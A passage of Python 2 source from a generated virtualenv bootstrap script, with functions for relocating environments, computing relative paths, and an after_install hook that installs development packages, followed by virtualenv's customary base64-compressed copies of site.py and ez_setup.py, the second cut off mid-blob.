if os.path.abspath(exe) != exe:
paths = os.environ.get('PATH', '').split(os.pathsep)
for path in paths:
if os.path.exists(os.path.join(path, exe)):
exe = os.path.join(path, exe)
break
if not os.path.exists(exe):
logger.fatal('The executable %s (from --python=%s) does not exist' % (exe, exe))
sys.exit(3)
return exe
############################################################
## Relocating the environment:
def make_environment_relocatable(home_dir):
"""
Makes the already-existing environment use relative paths, and takes out
the #!-based environment selection in scripts.
"""
activate_this = os.path.join(home_dir, 'bin', 'activate_this.py')
if not os.path.exists(activate_this):
logger.fatal(
'The environment doesn\'t have a file %s -- please re-run virtualenv '
'on this environment to update it' % activate_this)
fixup_scripts(home_dir)
fixup_pth_and_egg_link(home_dir)
## FIXME: need to fix up distutils.cfg
OK_ABS_SCRIPTS = ['python', 'python%s' % sys.version[:3],
'activate', 'activate.bat', 'activate_this.py']
def fixup_scripts(home_dir):
# This is what we expect at the top of scripts:
shebang = '#!%s/bin/python' % os.path.normcase(os.path.abspath(home_dir))
# This is what we'll put:
new_shebang = '#!/usr/bin/env python%s' % sys.version[:3]
activate = "import os; activate_this=os.path.join(os.path.dirname(__file__), 'activate_this.py'); execfile(activate_this, dict(__file__=activate_this)); del os, activate_this"
bin_dir = os.path.join(home_dir, 'bin')
for filename in os.listdir(bin_dir):
filename = os.path.join(bin_dir, filename)
if not os.path.isfile(filename):
# ignore subdirs, e.g. .svn ones.
continue
f = open(filename, 'rb')
lines = f.readlines()
f.close()
if not lines:
logger.warn('Script %s is an empty file' % filename)
continue
if not lines[0].strip().startswith(shebang):
if os.path.basename(filename) in OK_ABS_SCRIPTS:
logger.debug('Cannot make script %s relative' % filename)
elif lines[0].strip() == new_shebang:
logger.info('Script %s has already been made relative' % filename)
else:
logger.warn('Script %s cannot be made relative (it\'s not a normal script that starts with %s)'
% (filename, shebang))
continue
logger.notify('Making script %s relative' % filename)
lines = [new_shebang+'\n', activate+'\n'] + lines[1:]
f = open(filename, 'wb')
f.writelines(lines)
f.close()
def fixup_pth_and_egg_link(home_dir, sys_path=None):
"""Makes .pth and .egg-link files use relative paths"""
home_dir = os.path.normcase(os.path.abspath(home_dir))
if sys_path is None:
sys_path = sys.path
for path in sys_path:
if not path:
path = '.'
if not os.path.isdir(path):
continue
path = os.path.normcase(os.path.abspath(path))
if not path.startswith(home_dir):
logger.debug('Skipping system (non-environment) directory %s' % path)
continue
for filename in os.listdir(path):
filename = os.path.join(path, filename)
if filename.endswith('.pth'):
if not os.access(filename, os.W_OK):
logger.warn('Cannot write .pth file %s, skipping' % filename)
else:
fixup_pth_file(filename)
if filename.endswith('.egg-link'):
if not os.access(filename, os.W_OK):
logger.warn('Cannot write .egg-link file %s, skipping' % filename)
else:
fixup_egg_link(filename)
def fixup_pth_file(filename):
lines = []
prev_lines = []
f = open(filename)
prev_lines = f.readlines()
f.close()
for line in prev_lines:
line = line.strip()
if (not line or line.startswith('#') or line.startswith('import ')
or os.path.abspath(line) != line):
lines.append(line)
else:
new_value = make_relative_path(filename, line)
if line != new_value:
logger.debug('Rewriting path %s as %s (in %s)' % (line, new_value, filename))
lines.append(new_value)
if lines == prev_lines:
logger.info('No changes to .pth file %s' % filename)
return
logger.notify('Making paths in .pth file %s relative' % filename)
f = open(filename, 'w')
f.write('\n'.join(lines) + '\n')
f.close()
def fixup_egg_link(filename):
f = open(filename)
link = f.read().strip()
f.close()
if os.path.abspath(link) != link:
logger.debug('Link in %s already relative' % filename)
return
new_link = make_relative_path(filename, link)
logger.notify('Rewriting link %s in %s as %s' % (link, filename, new_link))
f = open(filename, 'w')
f.write(new_link)
f.close()
def make_relative_path(source, dest, dest_is_directory=True):
"""
Make a filename relative, where the filename is dest, and it is
being referred to from the filename source.
>>> make_relative_path('/usr/share/something/a-file.pth',
... '/usr/share/another-place/src/Directory')
'../another-place/src/Directory'
>>> make_relative_path('/usr/share/something/a-file.pth',
... '/home/user/src/Directory')
'../../../home/user/src/Directory'
>>> make_relative_path('/usr/share/a-file.pth', '/usr/share/')
'./'
"""
source = os.path.dirname(source)
if not dest_is_directory:
dest_filename = os.path.basename(dest)
dest = os.path.dirname(dest)
dest = os.path.normpath(os.path.abspath(dest))
source = os.path.normpath(os.path.abspath(source))
dest_parts = dest.strip(os.path.sep).split(os.path.sep)
source_parts = source.strip(os.path.sep).split(os.path.sep)
while dest_parts and source_parts and dest_parts[0] == source_parts[0]:
dest_parts.pop(0)
source_parts.pop(0)
full_parts = ['..']*len(source_parts) + dest_parts
if not dest_is_directory:
full_parts.append(dest_filename)
if not full_parts:
# Special case for the current directory (otherwise it'd be '')
return './'
return os.path.sep.join(full_parts)
############################################################
## Bootstrap script creation:
def create_bootstrap_script(extra_text, python_version=''):
"""
Creates a bootstrap script, which is like this script but with
extend_parser, adjust_options, and after_install hooks.
This returns a string that (written to disk of course) can be used
as a bootstrap script with your own customizations. The script
will be the standard virtualenv.py script, with your extra text
added (your extra text should be Python code).
If you include these functions, they will be called:
``extend_parser(optparse_parser)``:
You can add or remove options from the parser here.
``adjust_options(options, args)``:
You can change options here, or change the args (if you accept
different kinds of arguments, be sure you modify ``args`` so it is
only ``[DEST_DIR]``).
``after_install(options, home_dir)``:
After everything is installed, this function is called. This
is probably the function you are most likely to use. An
example would be::
def after_install(options, home_dir):
subprocess.call([join(home_dir, 'bin', 'easy_install'),
'MyPackage'])
subprocess.call([join(home_dir, 'bin', 'my-package-script'),
'setup', home_dir])
This example immediately installs a package, and runs a setup
script from that package.
If you provide something like ``python_version='2.4'`` then the
script will start with ``#!/usr/bin/env python2.4`` instead of
``#!/usr/bin/env python``. You can use this when the script must
be run with a particular Python version.
"""
filename = __file__
if filename.endswith('.pyc'):
filename = filename[:-1]
f = open(filename, 'rb')
content = f.read()
f.close()
py_exe = 'python%s' % python_version
content = (('#!/usr/bin/env %s\n' % py_exe)
+ '## WARNING: This file is generated\n'
+ content)
return content.replace('##EXT' 'END##', extra_text)
def adjust_options(options, args):
args[:] = ['./virtual-env/']
def after_install(options, home_dir):
if sys.platform == 'win32':
bin_dir = join(home_dir, 'Scripts')
else:
bin_dir = join(home_dir, 'bin')
subprocess.call([join(bin_dir, 'easy_install'), 'paver==1.0.3'])
subprocess.call([join(bin_dir, 'easy_install'), 'nose'])
subprocess.call([join(bin_dir, 'easy_install'), 'Sphinx>=0.6b1'])
subprocess.call([join(bin_dir, 'easy_install'), 'pkginfo'])
subprocess.call([join(bin_dir, 'easy_install'), 'bottle'])
subprocess.call([join(bin_dir, 'easy_install'), 'redis'])
subprocess.call([join(bin_dir, 'easy_install'), 'virtualenv'])
##file site.py
SITE_PY = """
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
yBXo8FFND74JkgILcmKn2vJbYxD8H2/QG9E=
""".decode("base64").decode("zlib")
##file ez_setup.py
EZ_SETUP_PY = """
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
